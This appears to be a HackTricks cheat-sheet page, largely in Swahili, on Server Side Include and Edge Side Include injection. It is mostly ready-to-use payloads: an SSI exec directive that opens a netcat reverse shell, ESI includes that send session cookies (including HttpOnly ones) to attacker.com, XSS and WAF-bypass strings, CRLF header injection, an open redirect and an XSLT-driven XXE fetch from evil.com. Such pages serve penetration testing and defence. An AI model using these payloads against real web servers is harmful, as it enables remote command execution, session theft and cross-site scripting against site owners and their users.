Server Side Inclusion/Edge Side Inclusion Injection

Reading time: 7 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Server Side Inclusion Basic Information

(Introduction taken from Apache docs)

SSI (Server Side Includes) ni maagizo ambayo yanapangwa katika kurasa za HTML, na yanatathminiwa kwenye seva wakati kurasa zinatolewa. Yanakuwezesha kuongeza maudhui yanayozalishwa kwa njia ya kidijitali kwenye ukurasa wa HTML uliopo, bila ya lazima kutoa ukurasa mzima kupitia programu ya CGI, au teknolojia nyingine ya kidijitali.
Kwa mfano, unaweza kuweka agizo katika ukurasa wa HTML uliopo, kama vile:

Na, wakati ukurasa unapotolewa, kipande hiki kitathminiwa na kubadilishwa na thamani yake:

Jumanne, 15-Jan-2013 19:28:54 EST

Uamuzi wa lini kutumia SSI, na lini kuwa na ukurasa wako ukizalishwa kabisa na programu fulani, mara nyingi ni suala la kiasi gani cha ukurasa ni cha kudumu, na kiasi gani kinahitaji kuhesabiwa upya kila wakati ukurasa unapotolewa. SSI ni njia nzuri ya kuongeza vipande vidogo vya taarifa, kama vile wakati wa sasa - ulioonyeshwa hapo juu. Lakini ikiwa sehemu kubwa ya ukurasa wako inazalishwa wakati inapotolewa, unahitaji kutafuta suluhisho lingine.

Unaweza kudhani uwepo wa SSI ikiwa programu ya wavuti inatumia faili zenye nyongeza .shtml, .shtm au .stm, lakini si hivyo tu.

Msemo wa kawaida wa SSI una muundo ufuatao:

<!--#directive param="value" -->

Angalia

javascript

// Document name
<!--#echo var="DOCUMENT_NAME" -->
// Date
<!--#echo var="DATE_LOCAL" -->

// File inclusion
<!--#include virtual="/index.html" -->
// Including files (same directory)
<!--#include file="file_to_include.html" -->
// CGI Program results
<!--#include virtual="/cgi-bin/counter.pl" -->
// Including virtual files (same directory)
<!--#include virtual="file_to_include.html" -->
// Modification date of a file
<!--#flastmod file="index.html" -->

// Command exec
<!--#exec cmd="dir" -->
// Command exec
<!--#exec cmd="ls" -->
// Reverse shell
<!--#exec cmd="mkfifo /tmp/foo;nc <PENTESTER IP> <PORT> 0</tmp/foo|/bin/bash 1>/tmp/foo;rm /tmp/foo" -->

// Print all variables
<!--#printenv -->
// Setting variables
<!--#set var="name" value="Rich" -->

Edge Side Inclusion

Kuna tatizo la kufanya cache taarifa au programu za dynamic kwani sehemu ya maudhui inaweza kuwa tofauti kwa wakati ujao maudhui yanapopatikana. Hii ndiyo sababu ESI inatumika, kuashiria kutumia lebo za ESI maudhui ya dynamic ambayo yanahitaji kuzalishwa kabla ya kutuma toleo la cache.
Ikiwa mshambuliaji anaweza kuiingiza lebo ya ESI ndani ya maudhui ya cache, basi, anaweza kuweza kuiingiza maudhui yoyote kwenye hati kabla ya kutumwa kwa watumiaji.

ESI Detection

Header ifuatayo katika jibu kutoka kwa seva ina maana kwamba seva inatumia ESI:

Surrogate-Control: content="ESI/1.0"

Ikiwa huwezi kupata kichwa hiki, seva inaweza kuwa inatumia ESI hata hivyo.
Mbinu ya kulipua kipofu inaweza pia kutumika kwani ombi linapaswa kufika kwenye seva ya washambuliaji:

javascript

// Basic detection
hell<!--esi-->o
// If previous is reflected as "hello", it's vulnerable

// Blind detection
<esi:include src=http://attacker.com>

// XSS Exploitation Example
<esi:include src=http://attacker.com/XSSPAYLOAD.html>

// Cookie Stealer (bypass httpOnly flag)
<esi:include src=http://attacker.com/?cookie_stealer.php?=$(HTTP_COOKIE)>

// Introduce private local files (Not LFI per se)
<esi:include src="supersecret.txt">

// Valid for Akamai, sends debug information in the response
<esi:debug/>

ESI exploitation

GoSecure created a table to understand possible attacks that we can try against different ESI-capable software, depending on the functionality supported:

Includes: Inasaidia amri ya <esi:includes>
Vars: Inasaidia amri ya <esi:vars>. Inafaida kwa kupita XSS Filters
Cookie: Vidakuzi vya hati vinapatikana kwa injini ya ESI
Upstream Headers Required: Programu za surrogates hazitashughulikia taarifa za ESI isipokuwa programu ya juu itoe vichwa
Host Allowlist: Katika kesi hii, ESI inajumuisha inawezekana tu kutoka kwa wenyeji wa seva walioidhinishwa, hivyo kufanya SSRF, kwa mfano, iwezekane tu dhidi ya wenyeji hao

Software	Includes	Vars	Cookies	Upstream Headers Required	Host Whitelist
Squid3	Yes	Yes	Yes	Yes	No
Varnish Cache	Yes	No	No	Yes	Yes
Fastly	Yes	No	No	No	Yes
Akamai ESI Test Server (ETS)	Yes	Yes	Yes	No	No
NodeJS esi	Yes	Yes	Yes	No	No
NodeJS nodesi	Yes	No	No	No	Optional

XSS

The following ESI directive will load an arbitrary file inside the response of the server

xml

<esi:include src=http://attacker.com/xss.html>

Pita ulinzi wa XSS wa mteja

xml

x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>

Use <!--esi--> to bypass WAFs:
<scr<!--esi-->ipt>aler<!--esi-->t(1)</sc<!--esi-->ript>
<img+src=x+on<!--esi-->error=ale<!--esi-->rt(1)>

Kuiba cookie kwa mbali

xml

<esi:include src=http://attacker.com/$(HTTP_COOKIE)>
<esi:include src="http://attacker.com/?cookie=$(HTTP_COOKIE{'JSESSIONID'})" />

Pora cookie HTTP_ONLY kwa XSS kwa kuireflect katika jibu:

bash

# This will reflect the cookies in the response
<!--esi $(HTTP_COOKIE) -->
# Reflect XSS (you can put '"><svg/onload=prompt(1)>' URL encoded and the URL encode eveyrhitng to send it in the HTTP request)
<!--esi/$url_decode('"><svg/onload=prompt(1)>')/-->

# It's possible to put more complex JS code to steal cookies or perform actions

Private Local File

Usichanganye hii na "Local File Inclusion":

markup

<esi:include src="secret.txt">

CRLF

markup

<esi:include src="http://anything.com%0d%0aX-Forwarded-For:%20127.0.0.1%0d%0aJunkHeader:%20JunkValue/"/>

Open Redirect

Ifuatayo itaongeza kichwa cha Location kwenye jibu

bash

<!--esi $add_header('Location','http://attacker.com') -->

Ongeza Kichwa

Ongeza kichwa katika ombi lililolazimishwa

xml

<esi:include src="http://example.com/asdasd">
<esi:request_header name="User-Agent" value="12345"/>
</esi:include>

Ongeza kichwa katika jibu (ni muhimu kupita "Content-Type: text/json" katika jibu lenye XSS)

bash

<!--esi/$add_header('Content-Type','text/html')/-->

<!--esi/$(HTTP_COOKIE)/$add_header('Content-Type','text/html')/$url_decode($url_decode('"><svg/onload=prompt(1)>'))/-->

# Check the number of url_decode to know how many times you can URL encode the value

CRLF katika Ongeza kichwa (CVE-2019-2438)

xml

<esi:include src="http://example.com/asdasd">
<esi:request_header name="User-Agent" value="12345
Host: anotherhost.com"/>
</esi:include>

Akamai debug

Hii itatuma taarifa za debug zilizojumuishwa katika jibu:

xml

<esi:debug/>

ESI + XSLT = XXE

Ni uwezekano kutumia eXtensible Stylesheet Language Transformations (XSLT) sintaksia katika ESI kwa kuashiria thamani ya param dca kama xslt. Hii inaweza kuruhusu kutumia XSLT kuunda na kutumia udhaifu wa XML External Entity (XXE):

xml

<esi:include src="http://host/poc.xml" dca="xslt" stylesheet="http://host/poc.xsl" />

XSLT faili:

xml

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE xxe [<!ENTITY xxe SYSTEM "http://evil.com/file" >]>
<foo>&xxe;</foo>

Angalia ukurasa wa XSLT:

{{#ref}} xslt-server-side-injection-extensible-stylesheet-language-transformations.md {{#endref}}

Marejeo

Orodha ya Ugunduzi wa Brute-Force

{{#ref}} https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssi_esi.txt {{#endref}}

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.